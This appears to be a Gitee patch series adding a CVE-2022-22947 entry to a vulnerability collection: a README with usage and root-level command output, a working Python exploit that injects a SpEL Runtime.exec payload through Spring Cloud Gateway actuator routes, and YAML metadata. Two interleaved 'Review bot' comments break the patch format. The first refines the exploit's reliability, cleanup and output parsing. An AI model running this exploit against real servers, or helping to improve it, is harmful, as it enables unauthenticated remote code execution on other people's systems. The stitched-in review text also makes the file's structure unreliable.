From c19cf9e484999d6384d09786e4da791b9c74c290 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 05:56:32 +0000 Subject: [PATCH 01/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20java-spring-cloud-ga?= =?UTF-8?q?teway?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring-cloud-gateway/.keep diff --git a/cve/java-spring-cloud-gateway/.keep b/cve/java-spring-cloud-gateway/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 3f5d6b75009eedf4ce4024f8e138a759a1eef510 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 05:57:12 +0000 Subject: [PATCH 02/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring-cloud-gateway/2022/.keep diff --git a/cve/java-spring-cloud-gateway/2022/.keep b/cve/java-spring-cloud-gateway/2022/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 4eef8f96e0635123f6609dbd8e85459ed8a1c7cf Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 05:58:00 +0000 Subject: [PATCH 03/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-22947?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 69ee7e958f9b56649079ae8b76736f2b9ef5a0bb Mon Sep 17 00:00:00 2001 
From: zxengweihao Date: Thu, 16 Mar 2023 05:59:45 +0000 Subject: [PATCH 04/17] =?UTF-8?q?=E4=B8=8A=E4=BC=A0poc?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: zxengweihao --- .../2022/CVE-2022-22947/README.md | 44 +++++++++++ .../2022/CVE-2022-22947/exploit.py | 76 +++++++++++++++++++ .../2022/CVE-2022-22947/requirements.txt | 5 ++ 3 files changed, 125 insertions(+) create mode 100644 cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md create mode 100644 cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py create mode 100644 cve/java-spring-cloud-gateway/2022/CVE-2022-22947/requirements.txt diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md new file mode 100644 index 00000000..d744b0b8 --- /dev/null +++ b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md 
@@ -0,0 +1,44 @@ +# Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE) +###### CVE: CVE-2022-22947 +###### CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947) +###### Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. + + +#### Usage +```sh +git clone https://github.com/carlosevieira/CVE-2022-22947 +cd CVE-2022-22947 +pip3 install -r requirements.txt +python3 exploit.py http://target 'id' +``` + +```sh +john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id' + + ################################################### + # # + # Exploit for CVE-2022-22947 # + # - Carlos Vieira (Crowsec) # + # # + # Usage: # + # python3 exploit.py # + # # + # Example: # + # python3 exploit.py http://localhost:8080 'id' # + # # + ################################################### + +[+] Stage deployed to /actuator/gateway/routes/rtxhovup +[+] Executing command... +[+] getting result... +[+] Stage removed! +uid=0(root) gid=0(root) groups=0(root) +``` + +#### References + +https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ + +https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published + +https://tanzu.vmware.com/security/cve-2022-22947 \ No newline at end of file diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py new file mode 100644 index 00000000..953f4759 --- /dev/null +++ b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py 
@@ -0,0 +1,76 @@ +import random +import string +import requests +import json +import sys +import urllib.parse +import base64 +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} + +id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) + +def exploit(url, command): + + payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} + + rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False) + if(rbase.status_code == 201): + print("[+] Stage deployed to /actuator/gateway/routes/"+id) + print("[+] Executing command...") + r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False) + if(r.status_code == 200): + print("[+] getting result...") + r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) + if(r.status_code == 200): + get_response = r.json() + clean(url, id) + return get_response['filters'][0].split("'")[1] + else: + print("[-] Error: Invalid response") + clean(url, id) + exit(1) + else: + clean(url, id) + print("[-] Error executing command") + else: + print("[X] Error: Fail to deploy stage (Patched ?)") + exit(1) + +def clean(url, id): + remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) + if(remove.status_code == 200): + print("[+] Stage removed!") + else: + print("[-] Error: Fail to remove stage") + +def banner(): + print(""" + ################################################### + # # + # Exploit for CVE-2022-22947 # + # - Carlos 
Vieira (Crowsec) # + # # + # Usage: # + # python3 exploit.py # + # # + # Example: # + # python3 exploit.py http://localhost:8080 'id' # + # # + ################################################### + """) + +def main(): + banner() + if len(sys.argv) != 3: + print("[-] Error: Invalid arguments") + print("[-] Usage: python3 exploit.py ") + exit(1) + else: + url = sys.argv[1] + command = sys.argv[2] + print(exploit(url, command)) +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/requirements.txt b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/requirements.txt new file mode 100644 index 00000000..e4f9df0f --- /dev/null +++ b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/requirements.txt @@ -0,0 +1,5 @@ +certifi==2021.10.8 +charset-normalizer==2.0.12 +idna==3.3 +requests==2.27.1 +urllib3==1.26.8 -- Gitee From c5109725fea514c8e3d8ef956860d295f4d11434 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 05:59:56 +0000 Subject: [PATCH 05/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 2baddec8b6fd2cd6144bdc83186af59739ecc0aa Mon Sep 17 00:00:00 2001 
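Review bot: The cleanup in `clean` only DELETEs the route definition and never POSTs `/actuator/gateway/refresh` again, so the gateway's live routing table presumably still carries the SpEL-bearing route until something else triggers a refresh; and because `exploit` calls `clean` only on its explicit status-code branches, any exception raised by `requests` after the 201 (connection reset, read error) leaves the staged route on the target with no cleanup at all. Moving the cleanup into a `try/finally` and refreshing after the delete closes both gaps, and since none of the `requests` calls pass `timeout=`, an unresponsive target currently hangs the tool indefinitely. The result extraction `get_response['filters'][0].split("'")[1]` truncates command output at the first single quote; if the route listing renders the evaluated header as `'...'`, taking the text between the first and last quote, `split("'", 1)[1].rsplit("'", 1)[0]`, is more robust. The command is spliced into `Runtime.exec("...")` unescaped, so a `"` in `command` breaks the SpEL string and shell syntax (pipes, redirects) is not interpreted because `exec(String)` only tokenizes on whitespace — worth a comment above the payload. `urllib.parse` and `base64` are imported but unused, and the module-level `id` shadows the builtin.

```python
def exploit(url, command):
    # … unchanged: payload construction …
    rbase = requests.post(url + '/actuator/gateway/routes/' + id, headers=headers, data=json.dumps(payload), verify=False, timeout=10)
    if rbase.status_code != 201:
        print("[X] Error: Fail to deploy stage (HTTP %d - patched, or actuator not exposed?)" % rbase.status_code)
        exit(1)
    print("[+] Stage deployed to /actuator/gateway/routes/" + id)
    try:
        # … unchanged: refresh, fetch route, parse result (drop the explicit clean() calls here) …
    finally:
        clean(url, id)  # always remove the staged route, even if a request raises

def clean(url, id):
    remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False, timeout=10)
    # the route table is only rebuilt on refresh; delete alone leaves the SpEL route live
    requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False, timeout=10)
    if remove.status_code == 200:
        print("[+] Stage removed!")
    else:
        print("[-] Error: Fail to remove stage")
```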
From: zxengweihao Date: Thu, 16 Mar 2023 06:00:13 +0000 Subject: [PATCH 06/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring-cloud-gateway/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring-cloud-gateway/.keep diff --git a/cve/java-spring-cloud-gateway/.keep b/cve/java-spring-cloud-gateway/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 2b894ac3b72935d0718890f1b754f5f90708c584 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:01:27 +0000 Subject: [PATCH 07/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring-cloud-gateway/2022/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring-cloud-gateway/2022/.keep diff --git a/cve/java-spring-cloud-gateway/2022/.keep b/cve/java-spring-cloud-gateway/2022/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 8bafc3eba4689bd0c09b14ef3aafdb4a7fef9027 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:02:03 +0000 Subject: [PATCH 08/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring-cloud-gateway/2022/yaml/.keep diff --git a/cve/java-spring-cloud-gateway/2022/yaml/.keep b/cve/java-spring-cloud-gateway/2022/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 17b070abf6f955fda2058ea0cc229232cee34977 Mon Sep 17 00:00:00 2001 
From: zxengweihao Date: Thu, 16 Mar 2023 06:02:08 +0000 Subject: [PATCH 09/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring-cloud-gateway/2022/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring-cloud-gateway/2022/yaml/.keep diff --git a/cve/java-spring-cloud-gateway/2022/yaml/.keep b/cve/java-spring-cloud-gateway/2022/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From f380303e345acf93cbee619669366ff6324cf5c9 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:14:29 +0000 Subject: [PATCH 10/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring-cloud-gateway/2022/yaml/.keep diff --git a/cve/java-spring-cloud-gateway/2022/yaml/.keep b/cve/java-spring-cloud-gateway/2022/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From a9d53cdbe79bc1708e59275f2c74eea793cef495 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:14:45 +0000 Subject: [PATCH 11/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring-cloud-gateway/2022/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring-cloud-gateway/2022/yaml/.keep diff --git a/cve/java-spring-cloud-gateway/2022/yaml/.keep b/cve/java-spring-cloud-gateway/2022/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From aa58c95d5fe7e3dc8fbe88421954b453191bca76 Mon Sep 17 00:00:00 2001 
From: zxengweihao Date: Thu, 16 Mar 2023 06:15:07 +0000 Subject: [PATCH 12/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring-cloud-gateway/2022/yaml/.keep diff --git a/cve/java-spring-cloud-gateway/2022/yaml/.keep b/cve/java-spring-cloud-gateway/2022/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 6a1dfa57220af8aeabf0fef09ad552c668c0b935 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:15:28 +0000 Subject: [PATCH 13/17] =?UTF-8?q?=E6=8F=90=E4=BA=A4yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: zxengweihao --- .../2022/yaml/CVE-2022-22947.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml diff --git a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml new file mode 100644 index 00000000..97cd25a8 --- /dev/null +++ b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml 
@@ -0,0 +1,21 @@ +id: CVE-2022-22947 +source: https://github.com/crowsec-edtech/CVE-2022-22947 +info: + name: Spring Cloud Gateway 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。 + severity: critical + description: | + Spring Cloud Gateway存在远程代码执行漏洞,该漏洞是发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。 + scope-of-influence: + Spring Cloud GateWay 3.1.0 + Spring Cloud GateWay >=3.0.0, <=3.0.6 + Spring Cloud GateWay <3.0.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-22947 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2022-22947 + cwe-id: CWE-94 + cnvd-id: CNNVD-2022-16402 + kve-id: None + tags: cve2022,spring-cloud-gateway \ No newline at end of file -- Gitee From 940836aee8314ec582b291e0f66c6fda9237e76e Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:15:34 +0000 Subject: [PATCH 14/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring-cloud-gateway/2022/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring-cloud-gateway/2022/yaml/.keep diff --git a/cve/java-spring-cloud-gateway/2022/yaml/.keep b/cve/java-spring-cloud-gateway/2022/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From f999f3b64e1e05a0c2f7282c4d203c0867ce9615 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:21:14 +0000 Subject: [PATCH 15/17] update other_list.yaml. Signed-off-by: zxengweihao --- other_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/other_list.yaml b/other_list.yaml index 9584b359..07ab1f7a 100644 --- a/other_list.yaml +++ b/other_list.yaml 
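Review bot: The `name` field holds a paragraph describing what Spring Cloud Gateway is rather than a name for the vulnerability entry, and the `description` ends with "执行任意远程请求" (execute arbitrary remote requests), which misstates the advisory's impact of arbitrary code execution on the host. I would use `name: Spring Cloud Gateway 远程代码执行漏洞 (CVE-2022-22947)` and end the description with `通过恶意构造的请求在远程主机上执行任意代码`. The `source` points at the crowsec-edtech repository while the README in this series tells users to clone carlosevieira/CVE-2022-22947; the two should agree so the provenance of `exploit.py` is unambiguous. Listing `Spring Cloud GateWay <3.0.0` as affected is consistent with the vendor's "older, unsupported versions" wording, but a comment saying so would stop readers from reading it as a verified range.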
@@ -19,4 +19,6 @@ cve: - CVE-2021-44142 nvidia: - CVE-2021-1056 + java-spring-cloud-gateway: + - CVE-2022-22947 cnvd: \ No newline at end of file -- Gitee From 0d536f3bd2e16e2b5ad5a8d53e55e5a91b22adaa Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:23:53 +0000 Subject: [PATCH 16/17] update cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml. Signed-off-by: zxengweihao --- cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml index 97cd25a8..6d06fcac 100644 --- a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml +++ b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml @@ -1,5 +1,6 @@ id: CVE-2022-22947 -source: https://github.com/crowsec-edtech/CVE-2022-22947 +source: + https://github.com/crowsec-edtech/CVE-2022-22947 info: name: Spring Cloud Gateway 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。 severity: critical -- Gitee From 47e411aa16cbfe52c4473f3e95a4158c8307fde0 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 07:03:08 +0000 Subject: [PATCH 17/17] update cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml. Signed-off-by: zxengweihao --- cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml index 6d06fcac..21923f43 100644 --- a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml +++ b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml 
@@ -17,6 +17,6 @@ info: cvss-score: 10.0 cve-id: CVE-2022-22947 cwe-id: CWE-94 - cnvd-id: CNNVD-2022-16402 + cnvd-id: None kve-id: None - tags: cve2022,spring-cloud-gateway \ No newline at end of file + tags: cve2022, spring-cloud-gateway \ No newline at end of file -- Gitee